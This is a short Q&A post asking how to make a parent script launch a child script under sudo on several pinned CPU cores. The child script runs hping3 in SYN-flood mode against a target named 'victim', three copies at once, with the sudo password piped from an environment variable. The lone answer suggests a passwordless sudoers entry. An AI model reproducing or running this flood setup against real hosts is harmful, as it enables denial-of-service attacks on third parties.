# How to run shell script from another as root on CPU cores?

Tags: linux, bash, shell, shell-script

I have a script (A.sh) which runs another script (B.sh), in which I need a root password to launch a command.

**A.sh:**

```
#!/bin/bash
script=./hping.sh
taskset -c 0 $script > ./test.txt &
taskset -c 1 $script > ./test.txt &
taskset -c 2 $script > ./test.txt &
```

**B.sh** (hping.sh)

```
#!/bin/bash
victim=$1
echo $sudoPW | sudo hping3 -i eth0 -d 128 -S --flood $victim
```

The problem is that when A.sh tries to run B.sh, it asks for a root password, and then it stops, it can't get the password from the console.

How can I solve this?

Comment: Do you want `sudo` to get the password from the console in the first place? `echo $sudoPW` suggests maybe you don't. Relevant: [this](https://superuser.com/q/1351872/432690) and [this](https://superuser.com/q/1255613/432690).

Answer (score 0):

It's not recommended to set the sudo password in environment variable. Other may get access to the password. Instead you can modify sudoer's file which will allow passwordless sudo for certain commands. 'hping3' in this case.